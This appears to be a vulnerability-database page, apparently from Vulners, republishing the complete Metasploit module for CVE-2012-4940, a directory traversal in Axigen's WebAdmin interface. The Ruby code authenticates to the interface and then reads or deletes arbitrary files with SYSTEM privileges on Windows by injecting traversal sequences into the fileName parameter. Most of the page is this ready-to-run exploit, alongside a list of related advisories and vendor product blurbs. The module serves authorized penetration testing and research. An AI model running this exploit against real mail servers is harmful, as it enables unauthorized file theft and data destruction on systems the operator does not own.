Lucene search
K

Axigen Arbitrary File Read And Delete

🗓️ 31 Aug 2024 00:00:00Reported by juan vazquez, Zhao Liang, metasploit.comType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 127 Views

This module exploits a directory traversal vulnerability in the Axigen WebAdmin interface to read and delete arbitrary files with SYSTEM privileges on Windows platforms

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2012-4940
31 Oct 201200:00
circl
Check Point Advisories
Axigen Arbitrary File Read and Delete (CVE-2012-4940)
9 Jun 201300:00
checkpoint_advisories
CVE
CVE-2012-4940
31 Oct 201219:00
cve
Cvelist
CVE-2012-4940
31 Oct 201219:00
cvelist
Metasploit
Axigen Arbitrary File Read and Delete
13 Mar 201310:52
metasploit
Nuclei
Axigen Mail Server Filename Directory Traversal
3 Jun 202606:04
nuclei
NVD
CVE-2012-4940
31 Oct 201219:55
nvd
Packet Storm
Axigen 8.10 Directory Traversal
7 Mar 202500:00
packetstorm
Prion
Directory traversal
31 Oct 201219:55
prion
CERT
Axigen Mail Server directory traversal vulnerability
31 Oct 201200:00
cert
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Axigen Arbitrary File Read and Delete',  
'Description' => %q{  
This module exploits a directory traversal vulnerability in the WebAdmin  
interface of Axigen, which allows an authenticated user to read and delete  
arbitrary files with SYSTEM privileges. The vulnerability is known to work on  
Windows platforms. This module has been tested successfully on Axigen 8.10 over  
Windows 2003 SP2.  
},  
'Author' => [  
'Zhao Liang', # Vulnerability discovery  
'juan vazquez' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' => [  
[ 'US-CERT-VU', '586556' ],  
[ 'CVE', '2012-4940' ],  
[ 'OSVDB', '86802' ]  
],  
'Actions' => [  
['Read', { 'Description' => 'Read remote file' }],  
['Delete', { 'Description' => 'Delete remote file' }]  
],  
'DefaultAction' => 'Read',  
'DisclosureDate' => '2012-10-31'  
)  
)  
  
register_options(  
[  
Opt::RPORT(9000),  
OptInt.new('DEPTH', [ true, 'Traversal depth if absolute is set to false', 4 ]),  
OptString.new('TARGETURI', [ true, 'Path to Axigen WebAdmin', '/' ]),  
OptString.new('USERNAME', [ true, 'The user to authenticate as', 'admin' ]),  
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ]),  
OptString.new('PATH', [ true, 'The file to read or delete', '\\windows\\win.ini' ])  
]  
)  
end  
  
def run  
print_status('Trying to login')  
if login  
print_good('Login Successful')  
else  
print_error('Login failed, review USERNAME and PASSWORD options')  
return  
end  
  
@traversal = '../' * 10  
file = datastore['PATH']  
@platform = get_platform  
  
if @platform == 'windows'  
@traversal.gsub!(%r{/}, '\\')  
file.gsub!(%r{/}, '\\')  
else # unix  
print_error('*nix platform detected, vulnerability is only known to work on Windows')  
return  
end  
  
case action.name  
when 'Read'  
read_file(datastore['PATH'])  
when 'Delete'  
delete_file(datastore['PATH'])  
end  
end  
  
def read_file(file)  
print_status('Retrieving file contents...')  
  
res = send_request_cgi(  
{  
'uri' => normalize_uri(target_uri.path, 'sources', 'logging', 'page_log_file_content.hsp'),  
'method' => 'GET',  
'cookie' => "_hadmin=#{@session}",  
'vars_get' => {  
'_h' => @token,  
'fileName' => "#{@traversal}#{file}"  
}  
}  
)  
  
if res && (res.code == 200) && res.headers['Content-Type'] && !res.body.empty?  
store_path = store_loot('axigen.webadmin.data', 'application/octet-stream', rhost, res.body, file)  
print_good("File successfully retrieved and saved on #{store_path}")  
else  
print_error('Failed to retrieve file')  
end  
end  
  
def delete_file(file)  
print_status("Deleting file #{file}")  
  
res = send_request_cgi(  
{  
'uri' => normalize_uri(target_uri.path),  
'method' => 'GET',  
'cookie' => "_hadmin=#{@session}",  
'vars_get' => {  
'_h' => @token,  
'page' => 'vlf',  
'action' => 'delete',  
'fileName' => "#{@traversal}#{file}"  
}  
}  
)  
  
if res && (res.code == 200) && res.body =~ (/View Log Files/)  
print_good("File #{file} deleted")  
else  
print_error("Error deleting file #{file}")  
end  
end  
  
def get_platform  
print_status('Retrieving platform')  
  
res = send_request_cgi(  
{  
'uri' => normalize_uri(target_uri.path),  
'method' => 'GET',  
'cookie' => "_hadmin=#{@session}",  
'vars_get' => {  
'_h' => @token  
}  
}  
)  
  
if res && (res.code == 200)  
if res.body =~ /Windows/  
print_good('Windows platform found')  
return 'windows'  
elsif res.body =~ /Linux/  
print_good('Linux platform found')  
return 'unix'  
end  
end  
  
print_warning('Platform not found, assuming UNIX flavor')  
return 'unix'  
end  
  
def login  
res = send_request_cgi(  
{  
'uri' => normalize_uri(target_uri.path),  
'method' => 'POST',  
'vars_post' => {  
'username' => datastore['USERNAME'],  
'password' => datastore['PASSWORD'],  
'submit' => 'Login',  
'action' => 'login'  
}  
}  
)  
  
if res && (res.code == 303) && res.headers['Location'] =~ (/_h=([a-f0-9]*)/)  
@token = ::Regexp.last_match(1)  
if res.get_cookies =~ /_hadmin=([a-f0-9]*)/  
@session = ::Regexp.last_match(1)  
return true  
end  
end  
  
return false  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation